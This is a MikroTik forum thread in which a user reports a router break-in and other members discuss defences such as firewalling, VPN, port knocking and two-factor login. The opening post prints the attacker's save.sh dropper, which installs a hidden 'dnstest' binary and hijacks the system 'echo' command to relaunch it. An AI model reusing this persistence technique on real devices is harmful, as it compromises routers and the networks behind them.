Community discussions

MikroTik App
 
aguntukk
newbie
Topic Author
Posts: 49
Joined: Thu Jul 10, 2014 2:37 pm

Mikrotik vulnerability

Sat Apr 21, 2018 12:37 pm

I noticed today an unusual login to my router and it create file in router os file.(Attached)
First some body login from 103.1.221.39 . And some how they cracked my password. Please check attached image. After that they enable ssh and telnet.

I upgrade the router on latest bugfix. 6.40.7

Its a very serious issue.
i got a file save.sh in file.
#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac


if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh

routeros vulnerable.jpg
You do not have the required permissions to view the files attached to this post.
 
pe1chl
Forum Guru
Forum Guru
Posts: 6784
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 12:41 pm

You should not allow login to your router from the internet! Fix your firewall configuration...
 
eddieb
Member Candidate
Member Candidate
Posts: 173
Joined: Thu Aug 28, 2014 10:53 am
Location: Netherlands

Re: Mikrotik vulnerability

Sat Apr 21, 2018 12:43 pm

Problems like this should be reported directly to support@mikrotik.com
NEVER allow management on your devices from internet. Fix your firewall.
Pick a strong password, took only 3 seconds according to your log ...
Running 6.47 (stable) on :
CCR1009-8G-1S (2x ipsec/l2tp site-to-site, ipsec/l2tp roadwarrior, dhcpd, dns), CRS125-24G-1S, RB1100, RB962UiGS-5HacT2HnT (10pc), RB931-2nD, RB951, RB750GL ,RB2011UAS-RM, RB750Gr3 running dude
 
User avatar
manuzoli
Frequent Visitor
Frequent Visitor
Posts: 78
Joined: Mon Oct 03, 2016 6:47 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 1:50 pm

seems you are not the only one.
viewtopic.php?f=2&t=133438&p=655824
 
Sob
Forum Guru
Forum Guru
Posts: 5700
Joined: Mon Apr 20, 2009 9:11 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 2:37 pm

You should not allow login to your router from the internet! Fix your firewall configuration...
What if I need ability to login to router from any random address (travelling admin)? Shouldn't non-standard username and super-strong password be secure enough? Disabling everything might be secure, but not always very practical. Another option is VPN, but when I need to make it accessible from anywhere, in principle it's exactly the same problem, it too can have some nasty vulnerability.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply. Not intended as incentive for masochists.
 
mkx
Forum Guru
Forum Guru
Posts: 4472
Joined: Thu Mar 03, 2016 10:23 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 4:10 pm

It's been said long time ago: the only secure network is the one without connection to other networks (nowadays that means no internet) and with full physical security.
This, of course, leaves out legitimate but malicious users. And stupid users, I wonder which ones do more harm.

Security and ease of use are almost inversely proportional and one has to compromise between the two.
BR,
Metod
 
squeeze
Member Candidate
Member Candidate
Posts: 146
Joined: Thu Mar 22, 2018 7:53 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 4:46 pm

You should not allow login to your router from the internet! Fix your firewall configuration...
What if I need ability to login to router from any random address (travelling admin)? Shouldn't non-standard username and super-strong password be secure enough? Disabling everything might be secure, but not always very practical. Another option is VPN, but when I need to make it accessible from anywhere, in principle it's exactly the same problem, it too can have some nasty vulnerability.

If there were viable remote vulnerabilities for VPN or tunnels like SSH, it would be headline news. Since they are so widely used for so many purposes, for so long, and specifically designed for the job, they are about as mature and secure as it is possible to be for networking protocols. They are international standards. So, much of the security effort comes embedded within the protocol and is not handrolled by one or a handful of individuals at one company. Also, they tend to have a lot of supporting tools available.

Something you can also use, equally with VPNs as you can with bare ordinary services, is port knocking. I think there are a couple of tutorials around the forums for how to achieve this with Mikrotik gear. With properly configured port knocking, attackers have no reasonable chance of even seeing desired services remotely.
 
anav
Forum Guru
Forum Guru
Posts: 4800
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik vulnerability

Sat Apr 21, 2018 5:51 pm

Perhaps mikrotik should consider building in the use of a rolling code device that works with winbox. Businesses are now using this (rolling code device or RSA app for example, for protection on local within the premises computers and VPN for any external access. Not providing at least the above for admin access is perhaps a gap to be rectified.
Winbox should not necessarily be a fixed port and wondered why I dont have the opportunity to change it.
My current router allows HTTPS from a non-standard port for example (of my choosing).

However, don't blame the router vendor for piss poor security practices by the user, be it an easy password, not changing admin to some other user name etc.....
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
anav
Forum Guru
Forum Guru
Posts: 4800
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik vulnerability

Sat Apr 21, 2018 5:55 pm

You should not allow login to your router from the internet! Fix your firewall configuration...
What if I need ability to login to router from any random address (travelling admin)? Shouldn't non-standard username and super-strong password be secure enough? Disabling everything might be secure, but not always very practical. Another option is VPN, but when I need to make it accessible from anywhere, in principle it's exactly the same problem, it too can have some nasty vulnerability.
Are you kidding me?? All the more reason and advice given freely everywhere, that non-secure locations to a business account require PKI, VPN, rolling code or some type of extra layer of security over simply name and password. Heck, I have avast secure me and VPN service on my cell phone for when I use other peoples WIFI. One would think it be even more stringent for admin access.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
mrtester
just joined
Posts: 9
Joined: Sat Dec 23, 2017 11:09 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:03 pm

On which version did you have an original problem?
Sounds like the problem which was already resolved a long time ago and recently there was a speciap annoncment from Mikrotik team about that. If I remeber correctly then versions before 6.38.5 were affected.
 
anav
Forum Guru
Forum Guru
Posts: 4800
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:10 pm

On which version did you have an original problem?
Sounds like the problem which was already resolved a long time ago and recently there was a speciap annoncment from Mikrotik team about that. If I remeber correctly then versions before 6.38.5 were affected.
This! We don't have enough information from the OP to make a determination. If the admin name is still admin and the default password has not been changed or is 1234, and the winbox port is wide open to the outside (not even IP limited), it wouldn't matter what version of software is being used.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
User avatar
CZFan
Forum Guru
Forum Guru
Posts: 1732
Joined: Sun Oct 09, 2016 8:25 pm
Location: South Africa, Randburg
Contact:

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:12 pm

On which version did you have an original problem?
Sounds like the problem which was already resolved a long time ago and recently there was a speciap annoncment from Mikrotik team about that. If I remeber correctly then versions before 6.38.5 were affected.

It also happened on 6.41.3, see viewtopic.php?f=2&t=133438&p=655824
MTCNA, MTCTCE, MTCRE & MTCINE
 
Sob
Forum Guru
Forum Guru
Posts: 5700
Joined: Mon Apr 20, 2009 9:11 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:42 pm

@squeeze: VPNs as whole are probably secure. But even well-designed protocol can be implemented wrong. And without trying to insinuate anything, MikroTik likes to implement own stuff, so you never know what might happen. I don't feel in danger with exposed VPNs on RouterOS. But if I was just a little less paranoid, I wouldn't feel in danger even with exposed WinBox port, with some reasonable precautions (e.g. password like "s%&GhVV@)3EkM2N@\g5:" and some rate limiting for login attempts) - good luck getting through (unless you cheat and use some vulnerability :)).

@anav: That was completely serious question. There are different levels of admin access, from simple home router, through company router, to nuclear facility (ok, now I might be kidding). And strong password should be ok for the lower levels.
Winbox should not necessarily be a fixed port and wondered why I dont have the opportunity to change it.
You can, see IP->Services.
My current router allows HTTPS from a non-standard port for example (of my choosing).
If you mean that you just moved HTTPS WebFig to non-standard port, but still have it accessible from everywhere, then you're not much safer. It's better than default port, where it takes only one attempt to check if the admin interface is there, but checking 65k ports is not that much harder.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply. Not intended as incentive for masochists.
 
anav
Forum Guru
Forum Guru
Posts: 4800
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:50 pm

True enough SOB, but for the lower levers one may easily assume WINBOX is secure enough. This assumption appears false. The fact that there is obviously some sort of bug that allows such a targeted penetration very quickly, so much so it looks like they can do it at will is very alarming. I have not exposed winbox or any other port but was considering it but decided that I would be more comfortable within a VPN. By the way my https access for the current router is for internal access only. As a home owner I havent found the need for external admin access yet.

For a homeowner a secure WInbox and good password should deter most as hacking is based primarily on EASE (hackers for fun) and then on SOMETHING OF VALUE (professional/state hackers for $$ or criminal activity etc). However, if it is easy to hack WINBOX then the homeowner is now vulnerable to the (hackers for fun crowd). For those concerned in the latter category, I image all use more layers including VPN. Just saying that mikrotik should add rolling code capability to WInbox or something like that as they continue to fail to nail it down sufficiently for the homeowner.

Does 6.42 close this security problem???
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
Sob
Forum Guru
Forum Guru
Posts: 5700
Joined: Mon Apr 20, 2009 9:11 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 7:42 pm

Just saying that mikrotik should add rolling code capability to WInbox or something like that ...
The two-factor approach seems to be popular, so they could add that. E.g. a code compatible with Google Authenticator (don't be discouraged by the name, it doesn't depend on Google at all, it's just that they made the application based on standard).
Does 6.42 close this security problem???
It's completely new, it wasn't even confirmed (or disproved) by MikroTik yet.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply. Not intended as incentive for masochists.
 
pe1chl
Forum Guru
Forum Guru
Posts: 6784
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 8:13 pm

Probably again some kind of worm. I traced for incoming port 8291 connects, telnetted back to a couple of them, and got a RouterOS login prompt on many.
Scary, because it could spread inside a network with firewall when it somehow gets in at some point, when access to winbox is allowed from all inside addresses.
Last edited by pe1chl on Sat Apr 21, 2018 8:16 pm, edited 1 time in total.
 
squeeze
Member Candidate
Member Candidate
Posts: 146
Joined: Thu Mar 22, 2018 7:53 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 8:15 pm

Winbox should not necessarily be a fixed port and wondered why I dont have the opportunity to change it.
My current router allows HTTPS from a non-standard port for example (of my choosing).

You can trivially change port on the Winbox client just by adding the usual port number ending you see in other TCP applications, i.e. 123.123.123.123:1234. You can change the port for all the running services in RouterOS IP Services Port.

A little less panic would also be welcome because not only has Mikrotik not confirmed the vulnerability but nowhere has anyone published or indicated how this alleged vulnerability is actually occurring. Most other vulnerabilities, the first you hear of them is from a security researcher, leak of a 0-day's details are released, or manufacturer's fixes.

Who is online

Users browsing this forum: JangoMunkie, yaylitzis and 47 guests